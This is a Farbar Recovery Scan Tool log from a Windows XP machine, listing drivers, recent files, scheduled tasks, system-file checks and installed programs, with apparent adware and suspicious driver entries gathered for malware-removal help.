==================== Drivers (Whitelisted) ====================

S4 abp480n5; C:\WINDOWS\system32\DRIVERS\ABP480N5.SYS [23552 2008-04-14] (Microsoft Corporation)
R1 AmdPPM; C:\WINDOWS\System32\DRIVERS\AmdPPM.sys [33792 2007-04-16] (Advanced Micro Devices)
S3 CCDECODE; C:\WINDOWS\System32\DRIVERS\CCDECODE.sys [17024 2008-04-14] (Microsoft Corporation)
R0 MpFilter; C:\WINDOWS\System32\DRIVERS\MpFilter.sys [214696 2013-09-27] (Microsoft Corporation)
S3 NdisIP; C:\WINDOWS\System32\DRIVERS\NdisIP.sys [10880 2008-04-14] (Microsoft Corporation)
R2 NPF; C:\WINDOWS\System32\drivers\npf.sys [36600 2013-02-28] (Riverbed Technology, Inc.)
R3 NVENETFD; C:\WINDOWS\System32\DRIVERS\NVENETFD.sys [54016 2008-01-29] (NVIDIA Corporation)
R3 nvnetbus; C:\WINDOWS\System32\DRIVERS\nvnetbus.sys [22016 2008-01-29] (NVIDIA Corporation)
R3 pfc; C:\WINDOWS\System32\drivers\pfc.sys [10368 2004-04-01] (Padus, Inc.)
R2 X4HS32Ex; C:\Program Files\Free Ride Games\X4HS32Ex.Sys [53280 2009-04-06] (Exent Technologies Ltd.)
S1 awikfypi; \??\C:\WINDOWS\system32\drivers\awikfypi.sys [X]
S1 eygjlels; \??\C:\WINDOWS\system32\drivers\eygjlels.sys [X]
S3 int15.sys; \??\c:\acernb\int15.sys [X]
S1 pnjvxpgn; \??\C:\WINDOWS\system32\drivers\pnjvxpgn.sys [X]
U5 Tcpip6; C:\Windows\System32\Drivers\Tcpip6.sys [226880 2010-02-11] (Microsoft Corporation)
U1 WS2IFSL;

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

Error(0) reading file: "C:\WINDOWS\system32\ "
2014-03-20 09:51 - 2014-03-20 09:52 - 00025321 _____ () C:\Documents and Settings\Buddy Harris\Desktop\FRST.txt
2014-03-20 09:51 - 2014-03-20 09:51 - 00000000 ____D () C:\FRST
2014-03-20 08:36 - 2014-03-20 08:36 - 01145856 _____ (Farbar) C:\Documents and Settings\Buddy Harris\Desktop\FRST.exe
2014-03-18 18:31 - 2014-03-19 20:32 - 00002418 _____ () C:\WINDOWS\wmsetup.log
2014-03-18 15:27 - 2014-03-18 15:27 - 00000000 ____D () C:\Avenger
2014-03-18 08:59 - 2014-03-18 08:59 - 00000786 _____ () C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
2014-03-18 08:59 - 2014-03-18 08:59 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Malwarebytes' Anti-Malware
2014-03-18 08:59 - 2013-04-04 14:50 - 00022856 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2014-03-17 19:35 - 2014-03-18 15:24 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\QueeenCoupon
2014-03-17 09:37 - 2014-03-17 09:08 - 00000232 _____ () C:\Documents and Settings\Buddy Harris\Start Menu\Programs\~ Realtek HD Sound Effect Manager.lnk
2014-03-17 09:36 - 2014-03-17 09:08 - 00000232 _____ () C:\Documents and Settings\Buddy Harris\Start Menu\Shortcut to Realtek HD Sound Effect Manager.lnk
2014-03-17 09:08 - 2014-03-17 09:08 - 00000232 _____ () C:\Documents and Settings\Buddy Harris\Desktop\Shortcut to Realtek HD Sound Effect Manager.lnk
2014-03-16 16:05 - 2014-03-16 16:05 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2930275$
2014-03-16 16:05 - 2014-03-16 16:05 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2929961$
2014-02-23 13:06 - 2014-02-23 13:06 - 00064240 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2014-02-23 12:58 - 2014-02-23 12:58 - 00001740 _____ () C:\Documents and Settings\All Users\Start Menu\Programs\Adobe Audition 1.5.lnk
2014-02-23 12:58 - 2014-02-23 12:58 - 00001734 _____ () C:\Documents and Settings\All Users\Desktop\Adobe Audition 1.5.lnk
2014-02-23 12:53 - 2014-02-23 12:53 - 00000000 ____D () C:\WINDOWS\Downloaded Installations
2014-02-23 10:57 - 2014-02-23 10:57 - 00000000 ____D () C:\Program Files\Deealu44Real
2014-02-23 10:09 - 2014-02-23 10:10 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Application Data\WinRAR
2014-02-23 10:07 - 2014-03-18 07:57 - 00000000 ____D () C:\Program Files\MyPC Backup
2014-02-23 10:07 - 2014-02-23 10:07 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Start Menu\Programs\Weather Alerts
2014-02-23 10:05 - 2014-03-19 08:51 - 00000372 _____ () C:\WINDOWS\Tasks\Re-Markable_wd.job
2014-02-23 10:05 - 2014-02-23 10:06 - 00000000 ____D () C:\Program Files\Re-Markable

==================== One Month Modified Files and Folders =======

2014-03-20 09:52 - 2014-03-20 09:51 - 00025321 _____ () C:\Documents and Settings\Buddy Harris\Desktop\FRST.txt
2014-03-20 09:51 - 2014-03-20 09:51 - 00000000 ____D () C:\FRST
2014-03-20 09:28 - 2014-02-17 01:28 - 00000420 _____ () C:\WINDOWS\Tasks\At27.job
2014-03-20 09:28 - 2014-02-12 01:28 - 00000420 _____ () C:\WINDOWS\Tasks\At26.job
2014-03-20 09:28 - 2013-07-29 08:28 - 00000420 _____ () C:\WINDOWS\Tasks\At25.job
2014-03-20 09:23 - 2012-04-14 17:28 - 00000830 _____ () C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2014-03-20 09:15 - 2011-05-24 11:27 - 01774850 _____ () C:\WINDOWS\WindowsUpdate.log
2014-03-20 09:03 - 2010-06-02 11:05 - 00000898 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2014-03-20 08:42 - 2010-01-09 09:41 - 00000458 _____ () C:\WINDOWS\Tasks\COMODO System Cleaner Update.job
2014-03-20 08:36 - 2014-03-20 08:36 - 01145856 _____ (Farbar) C:\Documents and Settings\Buddy Harris\Desktop\FRST.exe
2014-03-20 08:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At9.job
2014-03-20 07:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At8.job
2014-03-20 06:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At7.job
2014-03-20 05:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At6.job
2014-03-20 04:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At5.job
2014-03-20 03:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At4.job
2014-03-20 02:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At3.job
2014-03-20 01:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At2.job
2014-03-20 00:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At1.job
2014-03-19 23:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At24.job
2014-03-19 22:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At23.job
2014-03-19 21:29 - 2011-05-24 11:29 - 00032596 _____ () C:\WINDOWS\SchedLgU.Txt
2014-03-19 21:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At22.job
2014-03-19 20:32 - 2014-03-18 18:31 - 00002418 _____ () C:\WINDOWS\wmsetup.log
2014-03-19 20:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At21.job
2014-03-19 19:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At20.job
2014-03-19 18:57 - 2012-11-30 17:35 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Application Data\Dropbox
2014-03-19 18:50 - 2012-11-30 17:44 - 00000000 ___RD () C:\Documents and Settings\Buddy Harris\My Documents\Dropbox
2014-03-19 18:49 - 2009-08-02 10:37 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Application Data\Audacity
2014-03-19 18:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At19.job
2014-03-19 18:00 - 2009-12-24 11:42 - 00000488 _____ () C:\WINDOWS\Tasks\Norton Security Scan for Buddy Harris.job
2014-03-19 17:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At18.job
2014-03-19 16:52 - 2009-07-14 18:33 - 00000000 ____D () C:\~~~~
2014-03-19 16:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At17.job
2014-03-19 15:37 - 2010-03-22 12:27 - 00000300 _____ () C:\WINDOWS\Tasks\RealUpgradeScheduledTaskS-1-5-21-608057341-2165517387-3308722516-1005.job
2014-03-19 15:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At16.job
2014-03-19 14:47 - 2011-05-24 13:28 - 00000436 ____H () C:\WINDOWS\Tasks\User_Feed_Synchronization-{042C18C8-CDF0-49EE-A260-F2CEEBFEDE6A}.job
2014-03-19 14:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At15.job
2014-03-19 13:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At14.job
2014-03-19 12:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At13.job
2014-03-19 11:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At12.job
2014-03-19 10:48 - 2009-03-13 11:26 - 00000000 ____D () C:\WINDOWS\system32\Restore
2014-03-19 10:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At11.job
2014-03-19 09:29 - 2010-10-07 17:36 - 00000406 _____ () C:\WINDOWS\Tasks\At10.job
2014-03-19 09:02 - 2013-11-24 17:13 - 00000384 ____H () C:\WINDOWS\Tasks\Microsoft Antimalware Scheduled Scan.job
2014-03-19 08:52 - 2011-05-24 11:30 - 00000159 _____ () C:\WINDOWS\wiadebug.log
2014-03-19 08:52 - 2011-05-24 11:30 - 00000049 _____ () C:\WINDOWS\wiaservc.log
2014-03-19 08:52 - 2009-07-14 17:16 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Start Menu\Programs\CyberLink DVD Suite
2014-03-19 08:52 - 2009-03-13 11:25 - 00000000 ____D () C:\WINDOWS\Registration
2014-03-19 08:51 - 2014-02-23 10:05 - 00000372 _____ () C:\WINDOWS\Tasks\Re-Markable_wd.job
2014-03-19 08:51 - 2013-08-01 06:33 - 00000280 _____ () C:\WINDOWS\Tasks\RealUpgradeLogonTaskS-1-5-18.job
2014-03-19 08:51 - 2010-06-02 11:05 - 00000894 _____ () C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2014-03-19 08:51 - 2009-03-13 11:29 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2014-03-19 08:50 - 2009-07-14 17:16 - 00000178 ___SH () C:\Documents and Settings\Buddy Harris\ntuser.ini
2014-03-18 15:33 - 2009-03-13 03:22 - 00691510 _____ () C:\WINDOWS\system32\PerfStringBackup.INI
2014-03-18 15:27 - 2014-03-18 15:27 - 00000000 ____D () C:\Avenger
2014-03-18 15:26 - 2009-07-14 17:16 - 00000000 ____D () C:\Documents and Settings\Buddy Harris
2014-03-18 15:24 - 2014-03-17 19:35 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\QueeenCoupon
2014-03-18 15:24 - 2014-02-17 01:28 - 00000000 ____D () C:\Documents and Settings\NetworkService\Application Data\DigitalSites
2014-03-18 15:24 - 2014-02-12 01:28 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Application Data\DigitalSites
2014-03-18 15:24 - 2014-01-30 19:33 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\PnngToPPTCeounVerrt
2014-03-18 15:24 - 2013-12-15 18:49 - 00000000 ____D () C:\Program Files\Optimizer Pro
2014-03-18 15:24 - 2013-07-29 08:28 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Application Data\DigitalSite
2014-03-18 15:24 - 2011-11-09 16:41 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\WeCareReminder
2014-03-18 11:39 - 2011-11-11 13:56 - 00000000 __HDC () C:\WINDOWS\$968930Uinstall_KB968930$
2014-03-18 11:35 - 2011-09-04 10:41 - 00000000 ____D () C:\Program Files\Yontoo Layers Runtime
2014-03-18 08:59 - 2014-03-18 08:59 - 00000786 _____ () C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
2014-03-18 08:59 - 2014-03-18 08:59 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Malwarebytes' Anti-Malware
2014-03-18 08:59 - 2011-11-10 15:16 - 00000000 ____D () C:\Program Files\Malwarebytes' Anti-Malware
2014-03-18 07:57 - 2014-02-23 10:07 - 00000000 ____D () C:\Program Files\MyPC Backup
2014-03-18 00:28 - 2013-07-30 08:28 - 00000055 _____ () C:\Documents and Settings\NetworkService\Application Data\WB.CFG
2014-03-17 19:36 - 2014-01-24 14:17 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\1936fdbe5dd46c0d
2014-03-17 10:36 - 2012-08-22 14:58 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Application Data\vlc
2014-03-17 09:08 - 2014-03-17 09:37 - 00000232 _____ () C:\Documents and Settings\Buddy Harris\Start Menu\Programs\~ Realtek HD Sound Effect Manager.lnk
2014-03-17 09:08 - 2014-03-17 09:36 - 00000232 _____ () C:\Documents and Settings\Buddy Harris\Start Menu\Shortcut to Realtek HD Sound Effect Manager.lnk
2014-03-17 09:08 - 2014-03-17 09:08 - 00000232 _____ () C:\Documents and Settings\Buddy Harris\Desktop\Shortcut to Realtek HD Sound Effect Manager.lnk
2014-03-17 08:26 - 2013-03-24 18:54 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\Torch
2014-03-17 08:21 - 2009-07-25 16:45 - 00000000 ____D () C:\Program Files\CamStudio
2014-03-16 16:23 - 2009-03-13 03:22 - 00258248 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
2014-03-16 16:22 - 2011-11-11 14:31 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-03-16 16:06 - 2011-11-11 13:55 - 00001374 _____ () C:\WINDOWS\imsins.BAK
2014-03-16 16:06 - 2009-09-30 09:39 - 00000000 ____D () C:\WINDOWS\ie8updates
2014-03-16 16:05 - 2014-03-16 16:05 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2930275$
2014-03-16 16:05 - 2014-03-16 16:05 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2929961$
2014-03-16 16:03 - 2011-11-11 14:32 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Microsoft Silverlight
2014-03-16 00:28 - 2013-07-31 00:28 - 00000036 _____ () C:\Documents and Settings\Buddy Harris\Application Data\WB.CFG
2014-03-15 16:47 - 2009-07-14 19:07 - 00100352 _____ () C:\Documents and Settings\Buddy Harris\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-03-14 06:47 - 2013-08-01 06:33 - 00000288 _____ () C:\WINDOWS\Tasks\RealUpgradeScheduledTaskS-1-5-18.job
2014-03-13 16:01 - 2013-03-27 07:06 - 00000724 _____ () C:\Documents and Settings\Buddy Harris\Desktop\Time Warner phone.txt
2014-03-12 09:25 - 2012-04-14 17:28 - 00692616 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
2014-03-12 09:25 - 2011-07-07 09:15 - 00071048 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
2014-03-04 10:19 - 2012-08-22 14:58 - 00000721 _____ () C:\Documents and Settings\All Users\Desktop\VLC media player.lnk
2014-02-24 16:24 - 2009-03-13 11:15 - 00174592 ____N (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2014-02-24 16:24 - 2009-03-13 11:15 - 00174592 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\ie4uinit.exe
2014-02-24 07:46 - 2009-09-30 09:30 - 00012800 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\xpshims.dll
2014-02-24 07:46 - 2009-03-13 11:26 - 00759296 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\vgx.dll
2014-02-24 07:46 - 2009-03-13 11:16 - 01216000 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\urlmon.dll
2014-02-24 07:46 - 2009-03-13 11:16 - 01216000 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2014-02-24 07:46 - 2009-03-13 11:16 - 00920064 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\wininet.dll
2014-02-24 07:46 - 2009-03-13 11:16 - 00920064 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2014-02-24 07:46 - 2009-03-13 11:16 - 00105984 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\url.dll
2014-02-24 07:46 - 2009-03-13 11:16 - 00105984 _____ (Microsoft Corporation) C:\WINDOWS\system32\url.dll
2014-02-24 07:46 - 2009-03-13 11:15 - 06022144 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\mshtml.dll
2014-02-24 07:46 - 2009-03-13 11:15 - 06022144 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2014-02-24 07:46 - 2009-03-13 11:15 - 00611840 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\mstime.dll
2014-02-24 07:46 - 2009-03-13 11:15 - 00611840 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstime.dll
2014-02-24 07:46 - 2009-03-13 11:15 - 00206848 ____N (Microsoft Corporation) C:\WINDOWS\system32\occache.dll
2014-02-24 07:46 - 2009-03-13 11:15 - 00206848 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\occache.dll
2014-02-24 07:46 - 2009-03-13 11:15 - 00067072 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\mshtmled.dll
2014-02-24 07:46 - 2009-03-13 11:15 - 00067072 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2014-02-24 07:45 - 2012-06-12 17:24 - 00522240 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\jsdbgui.dll
2014-02-24 07:45 - 2010-12-24 10:53 - 00743424 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\iedvtool.dll
2014-02-24 07:45 - 2009-09-30 09:30 - 00247808 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\ieproxy.dll
2014-02-24 07:45 - 2009-04-29 00:55 - 11113472 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\ieframe.dll
2014-02-24 07:45 - 2009-04-29 00:55 - 02006016 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\iertutil.dll
2014-02-24 07:45 - 2009-04-29 00:55 - 00630272 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\msfeeds.dll
2014-02-24 07:45 - 2009-04-29 00:55 - 00055296 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\msfeedsbs.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 01469440 ____N (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2014-02-24 07:45 - 2009-03-13 11:15 - 01469440 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\inetcpl.cpl
2014-02-24 07:45 - 2009-03-13 11:15 - 00387584 ____N (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 00387584 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\iedkcs32.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 00184320 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\iepeers.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 00043520 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\licmgr10.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\licmgr10.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 00025600 ____N (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 00025600 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\jsproxy.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 00018944 ____C (Microsoft Corporation) C:\WINDOWS\system32\dllcache\corpol.dll
2014-02-24 07:45 - 2009-03-13 11:15 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\system32\corpol.dll
2014-02-24 07:45 - 2007-08-13 22:54 - 11113472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2014-02-24 07:45 - 2007-08-13 22:54 - 00630272 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2014-02-24 07:45 - 2007-08-13 22:54 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeedsbs.dll
2014-02-24 07:45 - 2007-08-13 22:34 - 02006016 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2014-02-24 06:54 - 2009-03-13 11:15 - 00385024 _____ (Microsoft Corporation) C:\WINDOWS\system32\html.iec
2014-02-23 13:06 - 2014-02-23 13:06 - 00064240 _____ () C:\Documents and Settings\LocalService\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
2014-02-23 13:04 - 2014-02-13 16:44 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Deealu44Real
2014-02-23 12:58 - 2014-02-23 12:58 - 00001740 _____ () C:\Documents and Settings\All Users\Start Menu\Programs\Adobe Audition 1.5.lnk
2014-02-23 12:58 - 2014-02-23 12:58 - 00001734 _____ () C:\Documents and Settings\All Users\Desktop\Adobe Audition 1.5.lnk
2014-02-23 12:56 - 2009-07-14 17:16 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Application Data\Adobe
2014-02-23 12:56 - 2009-03-13 11:57 - 00000000 ____D () C:\Program Files\Adobe
2014-02-23 12:53 - 2014-02-23 12:53 - 00000000 ____D () C:\WINDOWS\Downloaded Installations
2014-02-23 10:57 - 2014-02-23 10:57 - 00000000 ____D () C:\Program Files\Deealu44Real
2014-02-23 10:18 - 2009-03-13 11:16 - 00001158 _____ () C:\WINDOWS\system32\wpa.dbl
2014-02-23 10:10 - 2014-02-23 10:09 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Application Data\WinRAR
2014-02-23 10:07 - 2014-02-23 10:07 - 00000000 ____D () C:\Documents and Settings\Buddy Harris\Start Menu\Programs\Weather Alerts
2014-02-23 10:06 - 2014-02-23 10:05 - 00000000 ____D () C:\Program Files\Re-Markable

Files to move or delete:
====================
C:\Windows\Tasks\At1.job
C:\Windows\Tasks\At10.job
C:\Windows\Tasks\At11.job
C:\Windows\Tasks\At12.job
C:\Windows\Tasks\At13.job
C:\Windows\Tasks\At14.job
C:\Windows\Tasks\At15.job
C:\Windows\Tasks\At16.job
C:\Windows\Tasks\At17.job
C:\Windows\Tasks\At18.job
C:\Windows\Tasks\At19.job
C:\Windows\Tasks\At2.job
C:\Windows\Tasks\At20.job
C:\Windows\Tasks\At21.job
C:\Windows\Tasks\At22.job
C:\Windows\Tasks\At23.job
C:\Windows\Tasks\At24.job
C:\Windows\Tasks\At25.job
C:\Windows\Tasks\At26.job
C:\Windows\Tasks\At27.job
C:\Windows\Tasks\At3.job
C:\Windows\Tasks\At4.job
C:\Windows\Tasks\At5.job
C:\Windows\Tasks\At6.job
C:\Windows\Tasks\At7.job
C:\Windows\Tasks\At8.job
C:\Windows\Tasks\At9.job


==================== Bamital & volsnap Check =================

C:\WINDOWS\explorer.exe => MD5 is legit
C:\WINDOWS\system32\winlogon.exe => MD5 is legit
C:\WINDOWS\system32\svchost.exe => MD5 is legit
C:\WINDOWS\system32\services.exe => MD5 is legit
C:\WINDOWS\system32\User32.dll => MD5 is legit
C:\WINDOWS\system32\userinit.exe => MD5 is legit
C:\WINDOWS\system32\rpcss.dll => MD5 is legit
C:\WINDOWS\system32\Drivers\volsnap.sys => MD5 is legit

==================== End Of Log ============================

 

|*****************************************************************************************************************|

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 13-03-2014  01
Ran by Buddy Harris at 2014-03-20 09:54:13
Running from C:\Documents and Settings\Buddy Harris\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

AV: Microsoft Security Essentials (Disabled - Up to date) {EDB4FA23-53B8-4AFA-8C5D-99752CCA7095}

==================== Installed Programs ======================

Acrobat.com (HKLM\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 1.1.377 - Adobe Systems Incorporated)
Acrobat.com (Version: 0.0.0 - Adobe Systems Incorporated) Hidden
Adobe AIR (HKLM\...\Adobe AIR) (Version: 1.0.4990 - Adobe Systems Inc.)
Adobe AIR (Version: 1.0.8.4990 - Adobe Systems Inc.) Hidden
Adobe Audition 1.5 (HKLM\...\{86EF9FC4-F209-4520-B7E1-C7FF0EEBDFFF}) (Version: 1.5 - Adobe Systems)
Adobe Flash Player 12 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 12.0.0.77 - Adobe Systems Incorporated)
Adobe Flash Player 12 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 12.0.0.77 - Adobe Systems Incorporated)
Adobe Reader X (10.1.8) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.8 - Adobe Systems Incorporated)
Agere Systems PCI-SV92EX Soft Modem (HKLM\...\Agere Systems Soft Modem) (Version:  - Agere Systems)
ASPCA TriMini Reminder by We-Care.com v5.0.2.1 (HKLM\...\{7E482AF6-AA1F-4CC5-BA13-0536675F5744}) (Version: 5.0.2.1 - We-Care.com)
Audacity 1.3.14 (Unicode) (HKLM\...\Audacity 1.3 Beta (Unicode)_is1) (Version:  - Audacity Team)
AVS Audio Converter 7.2 (HKLM\...\AVS Audio Converter_is1) (Version: 7.2.2.529 - Online Media Technologies Ltd.)
AVS Audio Editor version 4.2 (HKLM\...\AVS Audio Editor_is1) (Version:  - Online Media Technologies Ltd.)
AVS Audio Recorder version 3.9 (HKLM\...\AVS Audio Recorder 3.9_is1) (Version:  - Online Media Technologies Ltd.)
AVS Cover Editor 1.3.1.96 (AVS4YOU) (HKLM\...\AVSCoverEditor_AVS4YOU_is1) (Version:  - Online Media Technologies Ltd.)
AVS Disc Creator version 3.5 (HKLM\...\AVS Disc Creator_is1) (Version:  - Online Media Technologies Ltd.)
AVS Music Mix version 3.8 (HKLM\...\AVS Music Mix 3.8_is1) (Version:  - Online Media Technologies Ltd.)
AVS Photo Editor (HKLM\...\AVS Photo Editor_is1) (Version:  - Online Media Technologies Ltd.)
AVS Registry Cleaner 2.3.2.257 (HKLM\...\AVS Registry Cleaner_is1) (Version: 2.3.2.257 - Online Media Technologies Ltd.)
AVS Registry Cleaner version 2.2 (HKLM\...\AVSRegistryCleaner_is1) (Version:  - Online Media Technologies Ltd.)
AVS Ringtone Maker version 1.6 (HKLM\...\AVS Ringtone Maker 1.6_is1) (Version:  - Online Media Technologies Ltd.)
AVS Screen Capture version 2.0.2 (HKLM\...\AVS Screen Capture_is1) (Version:  - Online Media Technologies Ltd.)
AVS Update Manager 1.0 (HKLM\...\AVS Update Manager_is1) (Version:  - Online Media Technologies Ltd.)
AVS Video Converter 6 (HKLM\...\AVS4YOU Video Converter 6_is1) (Version:  - Online Media Technologies Ltd.)
AVS Video Editor 6 (HKLM\...\AVS Video Editor_is1) (Version:  - Online Media Technologies Ltd.)
AVS Video Recorder 2.5 (HKLM\...\AVS Video Recorder_is1) (Version:  - Online Media Technologies Ltd.)
AVS YouTube Uploader version 2.1 (HKLM\...\AVS YouTube Uploader 2.1_is1) (Version:  - Online Media Technologies Ltd.)
AVS4YOU Software Navigator 1.4 (HKLM\...\AVS4YOU Software Navigator_is1) (Version:  - Online Media Technologies Ltd.)
Choice Guard (Version: 1.2.87.0 - Microsoft Corporation) Hidden
Compatibility Pack for the 2007 Office system (HKLM\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Core FTP LE 2.1 (HKLM\...\Core FTP LE 2.1) (Version:  - )
Critical Update for Windows Media Player 11 (KB959772) (HKLM\...\KB959772_WM11) (Version:  - Microsoft Corporation)
CyberLink LabelPrint (HKLM\...\{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.0.3111 - CyberLink Corp.)
CyberLink Media Suite 8 (HKLM\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 8.0.2820b - CyberLink Corp.)
CyberLink Media Suite 8 (Version: 8.0.2820b - CyberLink Corp.) Hidden
CyberLink Power2Go 7 (HKLM\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 7.0.0.2719b - CyberLink Corp.)
CyberLink Power2Go 7 (Version: 7.0.0.2719b - CyberLink Corp.) Hidden
CyberLink PowerBackup 2.5 (HKLM\...\{ADD5DB49-72CF-11D8-9D75-000129760D75}) (Version: 2.5.9102 - CyberLink Corp.)
